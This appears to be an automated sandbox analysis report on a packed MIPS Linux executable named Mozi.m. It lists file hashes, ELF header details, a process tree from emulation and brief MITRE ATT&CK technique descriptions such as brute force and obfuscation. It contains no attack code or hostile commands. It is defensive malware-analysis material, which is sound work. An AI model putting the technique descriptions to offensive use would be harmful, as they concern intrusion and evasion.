SHA1:	EA17AE8007C0A8CA726BB6CD8AB11FA3C2B0B6ED
SHA-256:	1B7D539533FEF4C6B93F8556BE60B47018617E04FDBEA1C7D9EAA537DBD01CCC
SHA-512:	08557E8BFA541D2C69170FEABB5B46FECBD1FC75E65802A6139640128F0C22C996573F2AD06B141B8171A55267DAAC896B6154DBA04F3AD09B4498B6DD8C7FC0
Malicious:	false
Reputation:	low
Preview:	ProblemType: Crash.Date: Mon Jul 19 19:06:25 2021.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 017fe000-01d1f000 rw-p 00000000 00:00 0 [heap]. 7fef3bb17000-7fef3bc17000 rw-p 00000000 00:00 0 . 7fef3bc17000-7fef3bc2e000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7fef3bc2e000-7fef3be2d000 ---p 00017000 fc:00 2382

Static File Info

General
File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.504782494511512
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	Mozi.m
File size:	307960
MD5:	e957309c9cb381574c622b2d2a6798c0
SHA1:	3589d0f624deb034ad2ac15cb1f1f0f0fde10908
SHA256:	54dfe49f5b114030c318eb1be2d86bdcfac3e10d730b08631028f992fc92c9d0
SHA512:	a1abd5f2aba76d3fdfa6404ea4a7b88513b42b9dbe3870ec30f0fba488a06a2db3feea12b4052cd82023d7a810cac16061f4ecf9764beea2260633769de2de67
SSDEEP:	6144:7O/QJHZweEL/NOjCHm7FZZnch5wKSDP99zBa77oNsKqqfPqOJ:78QpZsKCaihDSDP99zBa/HKqoPqOJ
File Content Preview:	.ELF.....................A.h...4.........4. ...(.............@...@...........................C...C....................UPX!.X.....................\....\|.$..ELF..........@.`....4..^h... ...(......<...@......ll.....H.W.`.t.d....dt.Q.....].M............6...

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x41fb68
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	2
Section Header Offset:	0
Section Header Size:	40
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0x400000	0x400000	0x205b2	0x205b2	4.4298	0x5	R E	0x10000
LOAD	0x0	0x430000	0x430000	0x0	0x8ac18	0.0000	0x6	RW	0x10000

Network Behavior

No network behavior found

System Behavior

Analysis Process: Mozi.m PID: 4568 Parent PID: 4498

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/tmp/Mozi.m
Arguments:	/usr/bin/qemu-mips /tmp/Mozi.m
File size:	307960 bytes
MD5 hash:	e957309c9cb381574c622b2d2a6798c0

Chronological Activities

Analysis Process: upstart PID: 4587 Parent PID: 3310

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/sbin/upstart
Arguments:	n/a
File size:	0 bytes
MD5 hash:	00000000000000000000000000000000

Chronological Activities

Analysis Process: sh PID: 4587 Parent PID: 3310

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/bin/sh
Arguments:	/bin/sh -e /proc/self/fd/9
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: sh PID: 4588 Parent PID: 4587

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: date PID: 4588 Parent PID: 4587

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/bin/date
Arguments:	date
File size:	68464 bytes
MD5 hash:	54903b613f9019bfca9f5d28a4fff34e

Chronological Activities

Analysis Process: sh PID: 4589 Parent PID: 4587

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: apport-checkreports PID: 4589 Parent PID: 4587

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/usr/share/apport/apport-checkreports
Arguments:	/usr/bin/python3 /usr/share/apport/apport-checkreports --system
File size:	1269 bytes
MD5 hash:	1a7d84ebc34df04e55ca3723541f48c9

Chronological Activities

Analysis Process: upstart PID: 4614 Parent PID: 3310

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/sbin/upstart
Arguments:	n/a
File size:	0 bytes
MD5 hash:	00000000000000000000000000000000

Chronological Activities

Analysis Process: sh PID: 4614 Parent PID: 3310

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/bin/sh
Arguments:	/bin/sh -e /proc/self/fd/9
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: sh PID: 4615 Parent PID: 4614

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: date PID: 4615 Parent PID: 4614

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/bin/date
Arguments:	date
File size:	68464 bytes
MD5 hash:	54903b613f9019bfca9f5d28a4fff34e

Chronological Activities

Analysis Process: sh PID: 4632 Parent PID: 4614

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: apport-gtk PID: 4632 Parent PID: 4614

General

Start time:	17:06:24
Start date:	19/07/2021
Path:	/usr/share/apport/apport-gtk
Arguments:	/usr/bin/python3 /usr/share/apport/apport-gtk
File size:	23806 bytes
MD5 hash:	ec58a49a30ef6a29406a204f28cc7d87

Chronological Activities

Analysis Process: upstart PID: 4641 Parent PID: 3310

General

Start time:	17:06:25
Start date:	19/07/2021
Path:	/sbin/upstart
Arguments:	n/a
File size:	0 bytes
MD5 hash:	00000000000000000000000000000000

Chronological Activities

Analysis Process: sh PID: 4641 Parent PID: 3310

General

Start time:	17:06:25
Start date:	19/07/2021
Path:	/bin/sh
Arguments:	/bin/sh -e /proc/self/fd/9
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: sh PID: 4643 Parent PID: 4641

General

Start time:	17:06:25
Start date:	19/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: date PID: 4643 Parent PID: 4641

General

Start time:	17:06:25
Start date:	19/07/2021
Path:	/bin/date
Arguments:	date
File size:	68464 bytes
MD5 hash:	54903b613f9019bfca9f5d28a4fff34e

Chronological Activities

Analysis Process: sh PID: 4659 Parent PID: 4641

General

Start time:	17:06:25
Start date:	19/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: apport-gtk PID: 4659 Parent PID: 4641

General

Start time:	17:06:25
Start date:	19/07/2021
Path:	/usr/share/apport/apport-gtk
Arguments:	/usr/bin/python3 /usr/share/apport/apport-gtk
File size:	23806 bytes
MD5 hash:	ec58a49a30ef6a29406a204f28cc7d87

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
Tactics:	Credential Access
Data Sources:	Authentication logs, Office 365 account logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report Mozi.m

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Initial Sample

Jbx Signature Overview

AV Detection:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Malware Analysis System Evasion:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

System Behavior

Analysis Process: Mozi.m PID: 4568 Parent PID: 4498

General

Analysis Process: upstart PID: 4587 Parent PID: 3310

General

Analysis Process: sh PID: 4587 Parent PID: 3310

General

Analysis Process: sh PID: 4588 Parent PID: 4587

General

Analysis Process: date PID: 4588 Parent PID: 4587

General

Analysis Process: sh PID: 4589 Parent PID: 4587

General

Analysis Process: apport-checkreports PID: 4589 Parent PID: 4587

General

Analysis Process: upstart PID: 4614 Parent PID: 3310

General

Analysis Process: sh PID: 4614 Parent PID: 3310

General

Analysis Process: sh PID: 4615 Parent PID: 4614

General

Analysis Process: date PID: 4615 Parent PID: 4614

General

Analysis Process: sh PID: 4632 Parent PID: 4614

General

Analysis Process: apport-gtk PID: 4632 Parent PID: 4614

General

Analysis Process: upstart PID: 4641 Parent PID: 3310

General